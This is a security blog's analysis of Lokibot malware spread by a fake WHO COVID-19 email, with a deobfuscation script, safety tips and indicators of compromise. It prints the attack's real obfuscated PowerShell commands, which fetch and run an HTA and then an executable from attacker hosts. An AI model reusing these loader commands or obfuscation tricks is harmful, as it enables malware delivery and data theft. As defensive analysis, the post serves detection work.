
Lokibot Distribution via fake WHO E-Mail

Introduction:

As COVID-19 emerged as a global crisis, malware authors began using coronavirus themes as lures: phishing, and distributing trojans via fake emails and fake websites. This blog post presents our analysis of the distribution of Lokibot malware via a fake email posing as a message about research from the World Health Organization (WHO).

Distribution:

The email carries an attachment described as a PDF of safety measures, and uses the WHO logo to look more legitimate.

Fig 1. Fake Email

Analysis of Attachment:

The attachment is a compressed .zip archive named COVID-19_UPDATE.zip. Extracting it yields a shortcut file named COVID-19_UPDATE.jpg.lnk. A .lnk file is a Windows shortcut that runs the program or command associated with it as soon as the icon is clicked.

Fig 2. .lnk File

As shown in the figure above, the shortcut looks like an image file, but it is actually a .lnk file with an embedded command, which is executed when the file is clicked.

Fig 3. Malicious Command in .lnk file

The following encoded command is executed:

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe $ib=[string][char[]]@(0x68,0x74,0x74,0x70,0x73) -replace ' ','';$cd=[string][char[]]@(0x6d,0x73,0x68,0x74,0x61) -replace ' ','';sal twf $cd;$ib+='://cutt.ly/MtbRJGC';twf $ib

After decoding the strings, the command looks like this:

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe $ib=https;

$cd=mshta;

sal twf $cd;

$ib+='://cutt.ly/MtbRJGC';

twf $ib

It is now clear that a file is downloaded and executed via mshta. The link shortener points to https://185.242.104[.]197/wzjd/out-1068156992.hta, which is what gets downloaded.

HTA is the file extension for HTML Application files, an executable HTML format. HTA files are supported by Internet Explorer 5 and later and are executed by the mshta.exe program.

Analysis of .HTA File:

The .hta file contains heavily obfuscated VBScript intended to evade detection systems and hinder analysis. To isolate the relevant code, we worked backwards from the main function.

Fig 4. Main function in VBS code.

The code above shows that the command stored in the variable khezxtlctf is executed via WScript.Shell.

After decoding and joining the strings stored in that variable, we obtain the command that is executed:

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL mdosy $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;mdosy pijkdcmv $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|pijkdcmv;mdosy fdbhrvskngeojt $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cHM6Ly90aW55dXJsLmNvbS90bTV4YWNn';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);fdbhrvskngeojt $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""

The command above is still obfuscated and hard to read, but strings such as DownloadData and WriteAllBytes show that it downloads a file and writes it to disk.
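As an added example, not part of the original analysis: a small Python deobfuscator for the string-building tricks shared by the .lnk command and the .hta PowerShell stage above (char-code arrays, [char] concatenation, base64 literals, and Set-Alias chains that hide mshta, IEX and sAPS). The sample inputs are constructed to mirror those two stages, reusing the page's alias names but with placeholder URLs rather than the real IoCs.

```python
import base64
import re

# Idioms from both PowerShell stages: [string][char[]]@(...), [char]0xNN+..., base64 literals, 'sal X $var'.
CHAR_ARRAY = re.compile(r"\[string\]\[char\[\]\]@\(([0-9a-fA-Fx,\s]+)\)(?:\s*-replace\s*' ','')?")
CHAR_CONCAT = re.compile(r"\[char\]0x[0-9a-fA-F]{2}(?:\+\[char\]0x[0-9a-fA-F]{2})*")
B64_LITERAL = re.compile(r"'([A-Za-z0-9+/]{16,}={0,2})'")
ASSIGN = re.compile(r"(\$\w+)\s*=\s*'([^']*)'")
ALIAS_DEF = re.compile(r"\b(?:sal|set-alias)\s+(\w+)\s+(\$\w+|'?\w+'?)", re.IGNORECASE)
SUSPICIOUS = ("mshta", "IEX", "sAPS", "Net.WebClient", "DownloadData", "WriteAllBytes", "FromBase64String")

def _hex_to_str(text):
    return "".join(chr(int(h, 16)) for h in re.findall(r"0x([0-9a-fA-F]{2})", text))

def _b64(m):  # decode a quoted base64 literal only when it yields printable text
    try:
        text = base64.b64decode(m.group(1), validate=True).decode("utf-8")
    except (ValueError, UnicodeDecodeError):
        return m.group(0)
    return "'" + text + "'" if text.isprintable() else m.group(0)

def deobfuscate(cmd):
    """Collapse char-code/base64 string building, then resolve alias chains (the .hta stage aliases Set-Alias itself)."""
    cmd = CHAR_ARRAY.sub(lambda m: "'" + _hex_to_str(m.group(1)) + "'", cmd)
    cmd = CHAR_CONCAT.sub(lambda m: "'" + _hex_to_str(m.group(0)) + "'", cmd)
    cmd = B64_LITERAL.sub(_b64, cmd)
    for _ in range(5):  # each pass may expose alias definitions made through an earlier alias
        values = dict(ASSIGN.findall(cmd))  # $var='literal' assignments visible so far
        new = cmd
        for name, target in ALIAS_DEF.findall(cmd):
            target = values.get(target, target.strip("'"))
            if not target.startswith("$"):  # target still an unresolved variable: leave it
                new = re.sub(r"(?<![\w$])" + re.escape(name) + r"\b", lambda _m, t=target: t, new)
        if new == cmd:
            break
        cmd = new
    return cmd

def indicators(cmd):  # suspicious tokens that only become visible after deobfuscation
    clear = deobfuscate(cmd).lower()
    return [t for t in SUSPICIOUS if t.lower() in clear]

SAMPLE_LNK = (  # constructed: mirrors the .lnk stage above with a placeholder shortener URL
    "$ib=[string][char[]]@(0x68,0x74,0x74,0x70,0x73) -replace ' ','';"
    "$cd=[string][char[]]@(0x6d,0x73,0x68,0x74,0x61) -replace ' ','';"
    "sal twf $cd;$ib+='://shortener.example/PLACEHOLDER';twf $ib")
SAMPLE_HTA = (  # constructed: mirrors the .hta stage's alias-of-Set-Alias trick and download
    "$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;"
    "sAL mdosy $sypim;mdosy pijkdcmv $xzrhm;$kj='Net.WebClient';"
    "$u='" + base64.b64encode(b"https://example.invalid/payload").decode() + "';$w=New-Object $kj;$d=$w.DownloadData($u);[IO.File]::WriteAllBytes($o,$d)")
```

Running `deobfuscate` on the samples shows `mshta $ib` in the first stage and `IEX` plus `Net.WebClient`/`DownloadData`/`WriteAllBytes` in the second, which are the tokens a detection rule on PowerShell script-block logs would key on.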

Fig 5. Further decoding of the PowerShell command

The executable is downloaded from the remote URL and executed. It is the Lokibot trojan, which is designed to infiltrate systems, collect information and send it back to the attacker.

Process graph:

Fig 6. Process graph

How to Stay Safe:

  1. Do not open links or download attachments in emails from untrusted sources.
  2. Keep your device and software updated.
  3. Disable macros in MS Office.
  4. Keep your antivirus updated to protect your system from unknown threats.

Xunison Protection:

Xunison has detections in place for this attack and the vulnerabilities it exploits, so customers with up-to-date Xbrain intrusion prevention signatures are protected. Users should also update Xbrain regularly to prevent attackers from exploiting known vulnerabilities.

Xunison Signature:

INFECTED: LOKIBOT CNC CONNECTION DETECTED AND BLOCKED

IOCs:

Hash: 6e8f274f39145a31167eb35ea8fedfae5b62ab8bee255a90adf6513789d3678a (COVID-19_UPDATE.ZIP)

Hash: f6ca3d486d4eed11ff3c79ec690826b290b6110ac4a838fbbb24337aac338ffc (out-1429065212.hta)

IP: 185.242.104.197
